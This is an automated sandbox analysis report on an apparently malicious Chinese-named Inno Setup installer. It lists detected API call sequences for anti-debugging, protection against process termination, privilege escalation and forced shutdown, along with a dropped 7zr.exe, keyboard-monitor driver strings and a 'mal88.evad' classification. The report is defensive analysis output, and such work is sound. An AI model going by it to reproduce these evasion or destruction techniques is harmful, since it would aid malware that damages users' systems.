Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007EE4B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2126329450.0000000000821000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000000.2215420602.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007EE4B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2126329450.0000000000821000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000000.2215420602.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C163886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,8_2_6C163886
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,8_2_6C2E5120
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C163C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,8_2_6C163C62
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C163D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,8_2_6C163D18
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,8_2_6C2E5D60
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C163D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,8_2_6C163D62
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C1639CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,8_2_6C1639CF
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C163A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,8_2_6C163A6A
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C161950: CreateFileA,DeviceIoControl,CloseHandle,8_2_6C161950
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C164754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,8_2_6C164754
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C1647548_2_6C164754
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C174A278_2_6C174A27
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E18808_2_6C2E1880
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E6A438_2_6C2E6A43
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C346CE08_2_6C346CE0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C396D108_2_6C396D10
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B4DE08_2_6C3B4DE0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C318EA18_2_6C318EA1
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39EEF08_2_6C39EEF0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C36AEEF8_2_6C36AEEF
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C332EC98_2_6C332EC9
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A68208_2_6C3A6820
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C38E8108_2_6C38E810
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B48708_2_6C3B4870
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3648968_2_6C364896
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3AC8D08_2_6C3AC8D0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3AA9308_2_6C3AA930
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3969008_2_6C396900
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3189728_2_6C318972
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A89508_2_6C3A8950
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B69998_2_6C3B6999
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C370A528_2_6C370A52
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A4AA08_2_6C3A4AA0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C330B668_2_6C330B66
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C38AB908_2_6C38AB90
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C320BCA8_2_6C320BCA
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3AEBC08_2_6C3AEBC0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3784AC8_2_6C3784AC
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A44898_2_6C3A4489
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39E4D08_2_6C39E4D0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3825218_2_6C382521
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A85208_2_6C3A8520
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39C5808_2_6C39C580
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3925808_2_6C392580
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3945D08_2_6C3945D0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3AE6008_2_6C3AE600
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B46C08_2_6C3B46C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A67A08_2_6C3A67A0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C37C7F38_2_6C37C7F3
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B67C08_2_6C3B67C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C31C7CF8_2_6C31C7CF
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3900208_2_6C390020
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39E0E08_2_6C39E0E0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A82008_2_6C3A8200
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3AC2A08_2_6C3AC2A0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C393D508_2_6C393D50
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C367D438_2_6C367D43
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B5D908_2_6C3B5D90
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C399E808_2_6C399E80
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C371F118_2_6C371F11
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C38589F8_2_6C38589F
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A78C88_2_6C3A78C8
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3999F08_2_6C3999F0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C38FA508_2_6C38FA50
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C391AA08_2_6C391AA0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C38DAD08_2_6C38DAD0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C33540A8_2_6C33540A
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C35F5EC8_2_6C35F5EC
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39F5C08_2_6C39F5C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C38B6508_2_6C38B650
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3AF6408_2_6C3AF640
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3996E08_2_6C3996E0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B97008_2_6C3B9700
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3B37C08_2_6C3B37C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39F0508_2_6C39F050
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3330928_2_6C333092
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3971F08_2_6C3971F0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39D2808_2_6C39D280
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C39D3808_2_6C39D380
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A6AF08_2_6C3A6AF0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C3A37508_2_6C3A3750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009B81EC11_2_009B81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F81C011_2_009F81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009E425011_2_009E4250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0824011_2_00A08240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0C3C011_2_00A0C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A004C811_2_00A004C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009E865011_2_009E8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009EC95011_2_009EC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009C094311_2_009C0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009E8C2011_2_009E8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A04EA011_2_00A04EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A00E0011_2_00A00E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009FD08911_2_009FD089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009D10AC11_2_009D10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F518011_2_009F5180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009ED1D011_2_009ED1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A091C011_2_00A091C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0112011_2_00A01120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0D2C011_2_00A0D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009753CF11_2_009753CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009D53F311_2_009D53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009BD49611_2_009BD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A054D011_2_00A054D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0D47011_2_00A0D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0097157211_2_00971572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0155011_2_00A01550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009FD6A011_2_009FD6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009C965211_2_009C9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009797CA11_2_009797CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0098976611_2_00989766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0D9E011_2_00A0D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00971AA111_2_00971AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F5E8011_2_009F5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F5F8011_2_009F5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0098E00A11_2_0098E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F22E011_2_009F22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A1230011_2_00A12300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009DE49F11_2_009DE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F25F011_2_009F25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009EA6A011_2_009EA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009E66D011_2_009E66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0E99011_2_00A0E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F2A8011_2_009F2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009CAB1111_2_009CAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F6CE011_2_009F6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F70D011_2_009F70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009EB18011_2_009EB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009DB12111_2_009DB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0720011_2_00A07200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009FF3A011_2_009FF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0F3C011_2_00A0F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0099B3E411_2_0099B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009E741011_2_009E7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009FF42011_2_009FF420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0F59911_2_00A0F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A0353011_2_00A03530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009EF50011_2_009EF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A1351A11_2_00A1351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A1360111_2_00A13601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009E379011_2_009E3790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00A077C011_2_00A077C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0099F8E011_2_0099F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009EF91011_2_009EF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0098BAC911_2_0098BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F7AF011_2_009F7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009C3AEF11_2_009C3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0098BC9211_2_0098BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009F7C5011_2_009F7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_009EFDF011_2_009EFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: String function: 6C319240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: String function: 6C3B6F10 appears 727 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00971E40 appears 153 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 009728E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00A0FB10 appears 723 times
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.000000000357E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007F14A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000000.2122778970.00000000009B9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.14.drBinary string: \Device\TfSysMon
Source: tProtect.dll.14.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal88.evad.winEXE@116/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,8_2_6C2E5D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00979313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_00979313
